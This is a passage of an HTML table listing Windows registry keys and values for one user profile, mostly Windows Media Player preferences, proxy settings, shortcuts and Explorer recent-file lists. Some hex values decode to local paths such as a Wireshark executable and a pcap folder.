<td><span style="color: black; font-size: xx-small;">ShrinkToFit</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowEffects</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowFullScreenPlaylist</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">NowPlayingQuickHide</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowTitles</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowCaptions</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">NowPlayingPlaylist</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">NowPlayingMetadata</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">NowPlayingSettings</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">VizAutoSelect</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentDisplayView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"VizView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentSettingsView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"EQView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentMetadataView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"MediaInfoView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentDisplayPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentSettingsPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentMetadataPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserDisplayView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"VizView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPDisplayView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"VizView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPSettingsView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"EQView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPMetadataView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"MediaInfoView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserDisplayPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPDisplayPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPSettingsPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPMetadataPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPShowSettings</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPShowMetadata</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowAlbumArt</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">RandomFolderName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"0009236B"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">LastPlaylist</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,5c,00,62,00,6f,00,6d,00,62,00,65,00,72,00,5c,00,41,00,70,00,70,00,6c,00,69,00,63,00,61,00,74,00,69,00,6f,00,6e,00,20,00,44,00,61,00,74,00,61,00,5c,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,5c,00,4d,00,65,00,64,00,69,00,61,00,20,00,50,00,6c,00,61,00,79,00,65,00,72,00,5c,00,30,00,30,00,30,00,39,00,32,00,33,00,36,00,42,00,2e,00,77,00,70,00,6c,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">LastPlaylistQuery</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">LastPlaylistIndex</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\EqualizerSettings</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyStyle</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyPort</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000050</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyBypass</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyExclude</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyStyle</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyPort</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:000006db</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyBypass</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyExclude</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyStyle</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyPort</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000022a</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyBypass</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyExclude</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\UserOptions</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\UserOptions</span></td>
<td><span style="color: black; font-size: xx-small;">DesktopShortcut</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"no"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\UserOptions</span></td>
<td><span style="color: black; font-size: xx-small;">QuickLaunchShortcut</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\CreatedLinks</span></td>
<td><span style="color: black; font-size: xx-small;">Shortcut4</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Application Data\Microsoft\Internet Explorer\Quick Launch\Windows Media Player.lnk"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Multimedia\ActiveMovie</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Multimedia\ActiveMovie\Filter Cache</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Multimedia\ActiveMovie\Filter Cache</span></td>
<td><span style="color: black; font-size: xx-small;">0</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:e0,5a,00,00,65,68,63,66,00,00,00,00,00,00,00,00,02,01,00,00,00,00,00,00,01,00,20,00,49,00,00,00,40,00,64,00,65,00,76,00,69,00,63,00,65,00,3a,00,64,00,6d,00,6f,00,3a,00,7b,00,32,00,45,00,45,00,42,00,34,00,41,00,44,00,46,00,2d,00,34,00,35,00,37,00,38,00,2d,00,34,00,44,00,31,00,30,00,2d,00,42,00,43,00,41,00,37,00,2d,00,42,00,42,00,39,00,35,00,35,00,46,00,35,00,36,00,33,00,32,00,30,00,41,00,7d,00,7b,00,35,00,37,00,46,00,32,00,44,00,42,00,38,00,42,00,2d,00,45,00,36,00,42,00,42,00,2d,00,34,00,35,00,31,00,33,00,2d,00,39,00,44,00,34,00,33,00,2d,00,44,00,43,00,44,00,32,00,41,00,36,00,35,00,39,00,33,00,31,00,32,00,35,00,7d,00,00,00,00,00,40,00,64,00,65,00,76,00,69,00,63,00,65,00,3a,00,64,00,6d,00,6f,00,3a,00,7b,00,38,00,37,00,34,00,31,00,33,00,31,00,43,00,42,00,2d,00,34,00,45,00,43,00,43,00,2d,00,34,00,34,00,33,00,42,00,2d,00,38,00,39,00,34,00,38,00,2d,00,37,00,34,00,36,00,42,00,38,00,39,00,35,00,39,00,35,00,44,00,32,00,30,00,7d,00,7b,00,35,00,37,00,46,00,32,00,44,00,42,00,38,00,42,00,2d,00,45,00,36,00,42,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Uninstall</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU</span></td>
<td><span style="color: black; font-size: xx-small;">a</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:77,00,69,00,72,00,65,00,73,00,68,00,61,00,72,00,6b,00,2e,00,65,00,78,00,65,00,00,00,43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,5c,00,62,00,6f,00,6d,00,62,00,65,00,72,00,5c,00,4d,00,79,00,20,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU</span></td>
<td><span style="color: black; font-size: xx-small;">MRUList</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"a"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU</span></td>
<td><span style="color: black; font-size: xx-small;">a</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\My Documents\pcap"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU</span></td>
<td><span style="color: black; font-size: xx-small;">MRUList</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"a"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*</span></td>
<td><span style="color: black; font-size: xx-small;">a</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\My Documents\pcap"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*</span></td>
<td><span style="color: black; font-size: xx-small;">MRUList</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"a"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs</span></td>
<td><span style="color: black; font-size: xx-small;">Order</span></td>
<td><span style="color: black; font-size: xx-small;">hex:08,00,00,00,02,00,00,00,7c,09,00,00,01,00,00,00,0f,00,00,00,8a,00,00,00,00,00,00,00,7c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,6a,00,32,00,22,06,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,31,2e,4c,4e,4b,00,00,40,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,9a,00,00,00,01,00,00,00,8c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,7a,00,32,00,d3,02,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,32,2e,4c,4e,4b,00,00,50,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,20,00,43,00,61,00,74,00,61,00,6c,00,6f,00,67,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,d2,00,00,00,02,00,00,00,c4,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,b2,00,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:08,00,00,00,02,00,00,00,7c,09,00,00,01,00,00,00,0f,00,00,00,8a,00,00,00,00,00,00,00,7c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,6a,00,32,00,22,06,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,31,2e,4c,4e,4b,00,00,40,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,9a,00,00,00,01,00,00,00,8c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,7a,00,32,00,d3,02,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,32,2e,4c,4e,4b,00,00,50,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,20,00,43,00,61,00,74,00,61,00,6c,00,6f,00,67,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,d2,00,00,00,02,00,00,00,c4,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,b2,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage</span></td>
<td><span style="color: black; font-size: xx-small;">ProgramsCache</span></td>
